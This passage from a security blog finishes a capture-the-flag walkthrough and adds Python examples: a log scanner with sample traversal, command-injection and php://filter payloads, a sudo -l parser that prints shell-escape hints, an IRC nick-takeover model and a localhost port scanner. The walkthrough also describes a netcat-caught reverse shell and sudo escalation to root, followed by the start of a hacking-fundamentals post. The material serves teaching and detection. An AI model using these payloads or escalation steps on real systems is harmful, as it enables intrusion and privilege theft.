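10.0.0.5 - - [11/Mar/2018:16:01:15 -0400] "GET /?page=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 512 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2018:16:03:40 -0400] "GET /?page=mailer&mail=test;id HTTP/1.1" 200 930 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2018:16:04:01 -0400] "GET /?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Mar/2018:16:05:00 -0400] "GET /?page=contact HTTP/1.1" 200 1200 "-" "curl/7.58.0"
"""

# client-ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Patterns are matched against the fully URL-decoded parameter value.
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                       # ../ or ..\
ABS_PATH_RE = re.compile(r'^/(etc|proc|root|home|var)/')     # bare absolute path
WRAPPER_RE = re.compile(r'^(php|file|data|expect|phar|zip)://', re.I)
SHELL_META_RE = re.compile(r'[;&|`$]')                        # shell separators/expansion


def decode_param(value, rounds=3):
    """URL-decode repeatedly (bounded) so %252F and similar double encoding
    cannot hide a traversal sequence from the patterns below."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split a query string on '&' only, decoding each side ourselves.
    (urllib.parse.parse_qsl's treatment of ';' changed across Python versions,
    and ';' is exactly the character we want to keep inside the value.)"""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), decode_param(value)))
    return pairs


def classify_value(value):
    """Return the list of attack classes a parameter value looks like."""
    v = decode_param(value)
    tags = []
    if TRAVERSAL_RE.search(v) or ABS_PATH_RE.search(v):
        tags.append("lfi")
    if WRAPPER_RE.search(v):
        tags.append("php-wrapper")
    if SHELL_META_RE.search(v):
        tags.append("cmd-injection")
    return tags


def scan_log(text):
    """Run every request's query parameters through classify_value and
    collect the suspicious ones with the context a responder would want."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _, _, query = m.group("target").partition("?")
        for name, value in parse_query(query):
            tags = classify_value(value)
            if tags:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                    "tags": tags,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['param']}={f['value']!r} "
              f"-> {','.join(f['tags'])} (HTTP {f['status']})")
```

Two things worth noting in the design: the value is decoded more than once, because a single pass would let "..%252F" through as harmless text, and the 403 on the /etc/shadow request is still reported, since a blocked attempt is exactly the line an analyst wants to see before the 200 that follows it.<br />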
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeKJSPVym06pXcTm2jj7WADBuZIOZ9XPPacKzB64gtUz3-LwIrUq_aAaolYvpx4T4qN0FNuPmgwigFXy0hLbjMmXHa4vCwqIa4-hMkT79RF_sRx1TwctEMX9xP5uuk1RiC4nMo8jQz8qZ/s1600/reverse_shell_wwwdata.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeKJSPVym06pXcTm2jj7WADBuZIOZ9XPPacKzB64gtUz3-LwIrUq_aAaolYvpx4T4qN0FNuPmgwigFXy0hLbjMmXHa4vCwqIa4-hMkT79RF_sRx1TwctEMX9xP5uuk1RiC4nMo8jQz8qZ/s320/reverse_shell_wwwdata.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After a bit of research on the machine looking for privilege escalation opportunities, I found that sudo -l showed www-data could run iptables as waldo. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgywlGMNJx9LZdKlJ4RFHvjtpovuq3ydHV3tYyyCVu9MoZuPw534G2LVaHvE9ba62-FhBnHm99twk9I26TkDUSNNcP8RE779dET4yXk0ti0CM7b_GuXaYUJxwMcLmyyVZIVLBS9DDNv2YO_/s1600/sudo_listings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgywlGMNJx9LZdKlJ4RFHvjtpovuq3ydHV3tYyyCVu9MoZuPw534G2LVaHvE9ba62-FhBnHm99twk9I26TkDUSNNcP8RE779dET4yXk0ti0CM7b_GuXaYUJxwMcLmyyVZIVLBS9DDNv2YO_/s320/sudo_listings.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
So, let's see what we have to play with in iptables. It looks like there is a rule blocking traffic to ircd, and if we remember our port scan, port 6667 showed up as filtered. Deleting a firewall rule changes the state of the target, so on a real engagement note exactly what you removed so it can be put back. With that rule deleted, let's try to interact with the port.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIBwRqmVs7fZLD0a1qBj01Cei4-tn_f8g56tVYE80E7vy9LnfxzL7vssvOK2PE-ptRzYLqCgSaADmOqIKeu32xPNEt5ODYHYMka-NBIO6v4WOfv1YZkLo8kmTyIGjHDTodstabrYyUp4R_/s1600/iptables_delete_rule.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIBwRqmVs7fZLD0a1qBj01Cei4-tn_f8g56tVYE80E7vy9LnfxzL7vssvOK2PE-ptRzYLqCgSaADmOqIKeu32xPNEt5ODYHYMka-NBIO6v4WOfv1YZkLo8kmTyIGjHDTodstabrYyUp4R_/s320/iptables_delete_rule.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We know port 6667 is IRC and we found an irssi script in waldo's home directory. So I installed irssi and used it to connect to the victim system. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fxaljlR0tW167Pa5OrVBxldCwTdJGwiSjz53yYJAQsdWDfcStJt_9YvJwTlTyVrhfjtiF_f9YcjdA6vNYERyIUeXAZ_DYjGTWYEMqqgFtNCOKfGxNWMmZ2F-wbJJwN2Lk_2qwnElL-2R/s1600/found_irssi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fxaljlR0tW167Pa5OrVBxldCwTdJGwiSjz53yYJAQsdWDfcStJt_9YvJwTlTyVrhfjtiF_f9YcjdA6vNYERyIUeXAZ_DYjGTWYEMqqgFtNCOKfGxNWMmZ2F-wbJJwN2Lk_2qwnElL-2R/s320/found_irssi.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI3008PRc_tUfbsE8ZJ7amLosBwOVv4R60X7k-E0Gv0ZegC-64-D-XFuaG5cxKNcwbefEozJzbsZJVoSRDwA85fEo9dLtxmwgN2-JjMfVUNSjEVjnyIYWE5s73I_rlHyIbjuRG9RuxZDbO/s1600/irssi_chat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI3008PRc_tUfbsE8ZJ7amLosBwOVv4R60X7k-E0Gv0ZegC-64-D-XFuaG5cxKNcwbefEozJzbsZJVoSRDwA85fEo9dLtxmwgN2-JjMfVUNSjEVjnyIYWE5s73I_rlHyIbjuRG9RuxZDbO/s320/irssi_chat.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So now we're going to play around on this IRC server and see what happens. The '/list' command showed there is one channel, 'wallabyschat', and '/join wallabyschat' joined it.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMy3nR9VJGjno0KN2YVS993U1CMT6JvQ_bZ8WUtPrOsUa5X7v4-WULxBnjSoYvY8oCK4IlmeCHq3TGgJ2lqS-equH-k7WHGrpmSKWrkmvOdNGyqcKLX27m-epDlzl3FzzVIKpALV0QFKm-/s1600/wallabyschat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMy3nR9VJGjno0KN2YVS993U1CMT6JvQ_bZ8WUtPrOsUa5X7v4-WULxBnjSoYvY8oCK4IlmeCHq3TGgJ2lqS-equH-k7WHGrpmSKWrkmvOdNGyqcKLX27m-epDlzl3FzzVIKpALV0QFKm-/s320/wallabyschat.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
It looks like wallaby has a bot in here. I don't remember seeing that on the box, so I'm going to go back and look again. After a quick internet search for IRC bots and a look through wallaby's home folder, I found the answer: Sopel.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMGB5yyRuikmR6IMA8-H9SHkOWeJRsPstBeFh1VpHPqJW90G_RLM9EAKCS744Y0JWLJkhjCquysZ4pVWehDV7vM95JtwH0CPRJaohez4Ca3TzDMK3erVzEpi4gDmKaTC63beNIdw0lNP2j/s1600/irc_bot_google_search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMGB5yyRuikmR6IMA8-H9SHkOWeJRsPstBeFh1VpHPqJW90G_RLM9EAKCS744Y0JWLJkhjCquysZ4pVWehDV7vM95JtwH0CPRJaohez4Ca3TzDMK3erVzEpi4gDmKaTC63beNIdw0lNP2j/s320/irc_bot_google_search.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkaFpr5ferO293WNDY2qHniZaCbDDErrWLguBnH2g4n0s5-5nnj8jvz6R3cpWdpopAU_AmMWPWNdsw8aaIzFVj585L_OMwU9sJZfglFat1uN-ZydzXyMoQPJv9yaHAbe84sex-3365aaO/s1600/sopel_directory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkaFpr5ferO293WNDY2qHniZaCbDDErrWLguBnH2g4n0s5-5nnj8jvz6R3cpWdpopAU_AmMWPWNdsw8aaIzFVj585L_OMwU9sJZfglFat1uN-ZydzXyMoQPJv9yaHAbe84sex-3365aaO/s320/sopel_directory.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Looking in the modules directory we find a run.py module. It lets us run commands from the IRC chat, but only if we're waldo. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNo9-1-8vBPVf0jlY9oMPFNrlLz7UF1ywj80UdRKe8JM5qYE_gnLqBHiAXGzE5LOMdRm-3Evr4VoxGflbKA2tUKTEizi_oprkl6LFBsTKyllKHHy-zyTHbR6jHHPzuQv7nLmKpnBCYLxqG/s1600/run_py.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNo9-1-8vBPVf0jlY9oMPFNrlLz7UF1ywj80UdRKe8JM5qYE_gnLqBHiAXGzE5LOMdRm-3Evr4VoxGflbKA2tUKTEizi_oprkl6LFBsTKyllKHHy-zyTHbR6jHHPzuQv7nLmKpnBCYLxqG/s320/run_py.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
As expected, we're not waldo, so we aren't able to run commands. I apologize for the next section: I went through it without taking screenshots, so you'll have to excuse the lack of pictures while I explain what needed to be done to become waldo.<br />
<br />
If you recall from the sudo listing, we could run iptables, but we could also run vim on one specific file. That file matters because it is what allows anyone to use the sudo command, but there is nothing in it we need to change. Vim has a feature that lets us execute shell commands from inside the editor with :!&lt;command&gt;, so sudo vim becomes a shell with whatever privileges the sudo entry grants. We use it to find the process running tmux from the irssi.sh script and kill it. I believe the PID was 790, but don't quote me on it. Once that process is dead, waldo's nick is free on the IRC server, we change our nickname to waldo, and we can run commands.<br />
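Every hop in this box (www-data to waldo, and later wallaby to root) starts with reading sudo -l and recognising which entries are dangerous: an editor with a shell escape, a tool that changes the firewall, or NOPASSWD: ALL. The following is an added example, not code from the original post: a small parser for the text sudo -l prints that turns each (runas, command) pair into a record with a coarse risk label and a reminder of how that class of entry is usually abused. The sample listings are constructed to mirror the situations in this walkthrough, and /etc/example.conf is a placeholder, since the post does not name the real file.<br />

```python
import os
import re

# Constructed samples in the format `sudo -l` prints. The entries are made up
# to mirror the situations in this walkthrough; /etc/example.conf is a
# placeholder for the file the post does not name.
SAMPLE_WWW_DATA = """\
Matching Defaults entries for www-data on wallaby:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on wallaby:
    (waldo) NOPASSWD: /sbin/iptables
    (waldo) NOPASSWD: /usr/bin/vim /etc/example.conf
"""

SAMPLE_WALLABY = """\
User wallaby may run the following commands on wallaby:
    (ALL : ALL) NOPASSWD: ALL
"""

# Programs with a documented way to drop to a shell from inside them.
SHELL_ESCAPES = {
    "vim", "vi", "nano", "less", "more", "man",
    "find", "awk", "perl", "python", "python3", "env", "bash", "sh",
}
# Programs that let the runner change the host's packet filter.
FIREWALL_TOOLS = {"iptables", "ip6tables", "nft", "ufw"}

ENTRY_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>\S.*)$')
TAG_RE = re.compile(r'^([A-Z_]+):\s*')   # NOPASSWD:, SETENV:, ...


def assess(command):
    """Map a single sudo command spec to (risk label, program name)."""
    if command == "ALL":
        return "full-shell", "ALL"
    program = os.path.basename(command.split()[0])
    if program in SHELL_ESCAPES:
        return "shell-escape", program
    if program in FIREWALL_TOOLS:
        return "firewall-control", program
    return "review", program


def parse_sudo_l(text):
    """Parse `sudo -l` output into one record per (runas, command)."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        # "(user : group)" -> keep the user part only
        runas = m.group("runas").split(":")[0].strip()
        rest = m.group("rest")
        tags = []
        while True:
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        for command in [c.strip() for c in rest.split(", ") if c.strip()]:
            risk, program = assess(command)
            entries.append({
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
                "command": command,
                "program": program,
                "risk": risk,
            })
    return entries


def escape_hint(entry):
    """A one-line reminder of how each class of entry is typically abused."""
    u = entry["runas"]
    if entry["risk"] == "full-shell":
        return "sudo -i  (or: sudo su -)"
    if entry["program"] in {"vim", "vi"}:
        return f"sudo -u {u} {entry['command']}  then  :!/bin/sh"
    if entry["risk"] == "firewall-control":
        return f"sudo -u {u} {entry['program']} -L -n  (list, then -D to delete)"
    return "look the program up on GTFOBins: " + entry["program"]


if __name__ == "__main__":
    for sample in (SAMPLE_WWW_DATA, SAMPLE_WALLABY):
        for e in parse_sudo_l(sample):
            print(f"({e['runas']}) {e['command']:<35} {e['risk']:<17} {escape_hint(e)}")
```

The parser only starts reading after the "User ... may run the following commands" header, so the Defaults block (with its escaped colons) and any "may not run sudo" message fall through without producing entries. The "review" label is deliberate: anything not in the two short tables still needs a human look rather than a silent pass.<br />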
<br />
Here we can see that the .run command worked in the irc chat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_L8Mcqu4bs4bUfKP4Kjwr_JiEP6pbO2NUBUvhU5sgLc92OHFDIKxm8PssJ4K7OjgAQJ1q7wwhN2w6Dnt7p6xvCfN2FAsCTDuJeMuT0G3nEe0O5SIrnhUQ6baoZ-uX4NXHX_SYLiqHpjvr/s1600/run_as_waldo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_L8Mcqu4bs4bUfKP4Kjwr_JiEP6pbO2NUBUvhU5sgLc92OHFDIKxm8PssJ4K7OjgAQJ1q7wwhN2w6Dnt7p6xvCfN2FAsCTDuJeMuT0G3nEe0O5SIrnhUQ6baoZ-uX4NXHX_SYLiqHpjvr/s320/run_as_waldo.png" width="320" /></a></div>
<br />
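The whole jump from waldo to wallaby works because run.py authorises on the sender's nick, and an IRC nick is nothing more than a name the current connection has registered: it is yours the moment the previous holder's connection dies, which is exactly what killing the tmux session did. The following is an added example, not Sopel's code and not the box's run.py: a toy model of nick ownership on an IRC server, with the weak nick-based check next to a check on a server-vouched account identity. Sopel's trigger object carries an account field on servers that support it; the Message class here is a stand-in for that, not Sopel's own class.<br />

```python
class NickInUse(Exception):
    pass


class IrcServer:
    """Just enough of an IRC server to show who owns a nickname: a nick is
    held only as long as the connection that registered it is alive, and it
    says nothing about who is behind it."""

    def __init__(self):
        self._owner = {}        # nick -> connection id

    def connect(self, conn, nick):
        if nick in self._owner and self._owner[nick] != conn:
            raise NickInUse(nick)
        self._owner[nick] = conn

    def disconnect(self, conn):
        for nick in [n for n, c in self._owner.items() if c == conn]:
            del self._owner[nick]

    def change_nick(self, conn, new_nick):
        if new_nick in self._owner and self._owner[new_nick] != conn:
            raise NickInUse(new_nick)
        self.disconnect(conn)
        self._owner[new_nick] = conn

    def holder(self, nick):
        return self._owner.get(nick)


class Message:
    """What a bot module sees for one line of chat. `account` is the services
    account the server reports for the sender (None when the user has not
    identified), which a nick change cannot forge."""

    def __init__(self, nick, account, text):
        self.nick = nick
        self.account = account
        self.text = text


def run_allowed_by_nick(msg, owner_nick="waldo"):
    """The weak check: trust whoever currently wears the nick."""
    return msg.nick == owner_nick


def run_allowed_by_account(msg, owner_account="waldo"):
    """The sound check: trust an identity the server vouches for."""
    return msg.account is not None and msg.account == owner_account


def simulate_takeover():
    """Replay the walkthrough's move against both checks and report the outcomes."""
    server = IrcServer()
    server.connect("waldo-tmux", "waldo")      # waldo's irssi inside tmux
    server.connect("attacker", "www-data")

    out = {}
    try:
        server.change_nick("attacker", "waldo")
        out["steal_while_held"] = True
    except NickInUse:
        out["steal_while_held"] = False       # nick still owned by waldo's session

    server.disconnect("waldo-tmux")            # the killed tmux/irssi process
    server.change_nick("attacker", "waldo")
    out["holder_after_kill"] = server.holder("waldo")

    # The attacker now speaks as "waldo" but has no services account.
    msg = Message(nick="waldo", account=None, text=".run id")
    out["nick_check"] = run_allowed_by_nick(msg)
    out["account_check"] = run_allowed_by_account(msg)

    # The real waldo, reconnecting under a fallback nick but identified,
    # still passes the stronger check.
    real = Message(nick="waldo_", account="waldo", text=".run id")
    out["real_waldo_account_check"] = run_allowed_by_account(real)
    return out


if __name__ == "__main__":
    for k, v in simulate_takeover().items():
        print(f"{k}: {v}")
```

The takeaway for anyone writing a bot with a command that shells out: a nick is a display name, not a credential, so gate the command on something the server asserts (an identified account, or at minimum a full hostmask) and not on the nick alone.<br />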
Next we set up a local listener and use a Python reverse shell to get a shell on the box as wallaby. We simply put the Python command in the IRC chat, catch the reverse shell connection with netcat, and we're good to go!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifAX9QnjOgBx_snqgbGAIX5JnW0CZw-1BSXZ5Yfsn6vkC972BNzF0g2befd1XHVDuGPrSyf841NTBPwy4yRLfnLjUCPYRCcJ-0_WkctFKGqYap2ap2VCtEb3z3pCERdQGa9tXdM2sY_B0a/s1600/shell_as_wallaby.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifAX9QnjOgBx_snqgbGAIX5JnW0CZw-1BSXZ5Yfsn6vkC972BNzF0g2befd1XHVDuGPrSyf841NTBPwy4yRLfnLjUCPYRCcJ-0_WkctFKGqYap2ap2VCtEb3z3pCERdQGa9tXdM2sY_B0a/s320/shell_as_wallaby.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Sudo seems to be a theme of this challenge, so let's check the sudo permissions as wallaby.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2xAOe6okzl-eDulmZskrn9RP3-91FqclH_sq-N9gnlTaAE5TgwqxlSPRw8OuFfqJ7VjO9-HbbOcXyNVU3pKEXP8ZkS5oUeWPKl6ylwFF9_m_eiXyAygFBVTB7i49i8KDAk8-jHoM0wxf/s1600/sudo_everything_as_wallaby.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2xAOe6okzl-eDulmZskrn9RP3-91FqclH_sq-N9gnlTaAE5TgwqxlSPRw8OuFfqJ7VjO9-HbbOcXyNVU3pKEXP8ZkS5oUeWPKl6ylwFF9_m_eiXyAygFBVTB7i49i8KDAk8-jHoM0wxf/s320/sudo_everything_as_wallaby.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Wallaby can use sudo with no password to do anything it wants, so we are basically done! We run one command to officially get root, and then we can cat the flag. We run 'sudo su root' (sudo -i would do the same) and enjoy our new root shell.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiLJ9pkXLvRCSCorpEzctUeqUUwJB9n1ZfYsSo1j8VQDcjbfS_08NbSYnc8U5JDuszhHnkINx_ytFrvTND9rNQGNecb9qynhBOUw2w6ip-_awmE8YWyrPSHdjvr1YSdTweSi5xi9Z7svK/s1600/root_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiLJ9pkXLvRCSCorpEzctUeqUUwJB9n1ZfYsSo1j8VQDcjbfS_08NbSYnc8U5JDuszhHnkINx_ytFrvTND9rNQGNecb9qynhBOUw2w6ip-_awmE8YWyrPSHdjvr1YSdTweSi5xi9Z7svK/s320/root_shell.png" width="320" /></a></div>
<br />
Now, with our root shell, we cd to /root, cat flag.txt, and we are done!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxRVWQ9XBs0rtnF3F9kZmBnChcMD3Idl466XShI2BaKWO4kB3xHMKMH2Qp0Uv81g-hpYmNHdMDN3rxQJbXFDtdn24Rdt0sot1Z_CZM-xGhAVEXihAMy6n9Ork9ZzL0YKREVNOAfMWtHEr/s1600/flag_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvxRVWQ9XBs0rtnF3F9kZmBnChcMD3Idl466XShI2BaKWO4kB3xHMKMH2Qp0Uv81g-hpYmNHdMDN3rxQJbXFDtdn24Rdt0sot1Z_CZM-xGhAVEXihAMy6n9Ork9ZzL0YKREVNOAfMWtHEr/s320/flag_txt.png" width="320" /></a></div>
<br />
This was a fun challenge and I really like the use of IRC to facilitate the privilege escalation. Thanks for writing it, and I look forward to the second part!<br />
<br />
Posted by Austin (http://www.blogger.com/profile/01968094133955654942, noreply@blogger.com); comments: 1<br />
<br />
tag:blogger.com,1999:blog-918525977206186619.post-3837822822961315069, 2017-01-15T16:34:00.000-05:00 (updated 2017-01-15T16:34:29.069-05:00)<br />
<br />
5 Fundamentals Every Hacker Must Master<br />
<br />
Welcome to the new year! 2017 = 0x7E1 = 0111 1110 0001, just in case you were curious. So today, I wanted to discuss 5 fundamental skills that every hacker should master. I use the term hacker loosely because these apply to both offensive and defensive experts alike. I'm going to count down in reverse order, ready?<br />
<br />
5. Port Scanning<br />
<br />
This is the bread-and-butter of compromising a computer. After you have completed your information gathering phase and determined which computers are 'in-scope' for your purposes, you need to figure out where the weak points of the computer are. Hint: it's the open ports. Ports can tell us so much about the computer that we may not have gathered during the previous phase: which operating system is running? Which services are running? Sometimes they even tell us the overall role of that specific computer (mail server, DNS server, employee desktop, etc.). Being able to scan ports effectively, quickly, and quietly is the foundation of attacking a computer. On the defensive side, making sure only the services you need are running, keeping those services up to date (including patches for previously discovered vulnerabilities), and being able to detect network scanning is paramount. Nmap is the big name in port scanning, but you should also become familiar with other tools such as unicornscan, masscan, hping3, and Angry IP Scanner, and with p0f, which fingerprints hosts passively from traffic you already see rather than by scanning them.<br />
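To make the three states a scanner reports concrete (open, closed, and the "filtered" that the walkthrough above ran into on port 6667), here is an added example, not code from the original post: a minimal threaded TCP connect() scanner with banner grabbing, plus two helpers that stand up a throwaway local service and reserve a known-closed port so the scanner can be exercised against 127.0.0.1 without touching any other host. The banner string and the localhost targets are assumptions for the demo.<br />

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=0.5):
    """TCP connect() probe for one port.

    Returns (port, state, banner): a completed handshake is "open" (and we read
    whatever the service volunteers), an immediate RST is "closed", and a
    timeout or other failure is "filtered", which is what a firewall that
    silently drops packets looks like from the outside."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256).decode("latin-1").strip()
            except (socket.timeout, OSError):
                banner = ""
            return port, "open", banner
    except ConnectionRefusedError:
        return port, "closed", ""
    except (socket.timeout, OSError):
        return port, "filtered", ""


def scan(host, ports, timeout=0.5, workers=32):
    """Probe the given ports concurrently; returns {port: (state, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {port: (state, banner) for port, state, banner in results}


def start_local_service(banner, host="127.0.0.1"):
    """Start a throwaway TCP service on an ephemeral port that greets one
    client with `banner`. Returns the port number. (Demo fixture only.)"""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def reserve_closed_port(host="127.0.0.1"):
    """Pick a port the OS just handed out and released, so nothing listens there."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    open_port = start_local_service(b"220 demo-service ready\r\n")
    closed_port = reserve_closed_port()
    for port, (state, banner) in sorted(scan("127.0.0.1", [open_port, closed_port]).items()):
        print(f"{port:>5}/tcp {state:<8} {banner}")
```

A full connect() scan is the loud option: every open port gets a completed handshake that the service logs. It is shown here because it needs no privileges; Nmap's default SYN scan avoids completing the handshake, which is why it needs raw sockets and root.<br />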
<br />
4. Networking Models<br />
<br />
In general, networking models are an academic exercise, but they do serve one purpose while learning: a complete understanding of how information moves between computers. The Department of Defense (DoD) model is the most useful in my opinion. It has four layers (Network Access, Internet, Host-to-Host, and Application). The first layer (Network Access) covers the physical exchange of information across wires or a wireless medium, along with the transition from physical signals to framed data. The next layer (Internet) is what connects networks together; IP is the protocol used almost everywhere nowadays, so each computer is assigned an IP address and routers forward packets from one network to another based on those addresses. The third layer (Host-to-Host) is about how the two endpoints carry on their conversation. There are two main options (TCP and UDP), and they can be likened to a civil conversation and a stock market trading floor. TCP is connection-oriented and provides reliable, ordered delivery, so information arrives completely and in order at the expense of speed. UDP is almost the exact opposite: it shouts datagrams across the network with no handshake and no guarantee of delivery, hoping the right computer hears them and responds appropriately. Lastly, we have the application layer. This is where HTTP, FTP, SMB, and every other application protocol sends data over TCP or UDP, over IP (mostly), over wired or wireless media from one computer to another. Even if you don't understand the deep technical details of how each layer works, you should be familiar with how they work in general, because in order to exploit (offensive) or prevent exploits (defensive) you need to understand how the information is communicated.<br />
<br />
3. Programming from Assembly to Python<br />
<br />
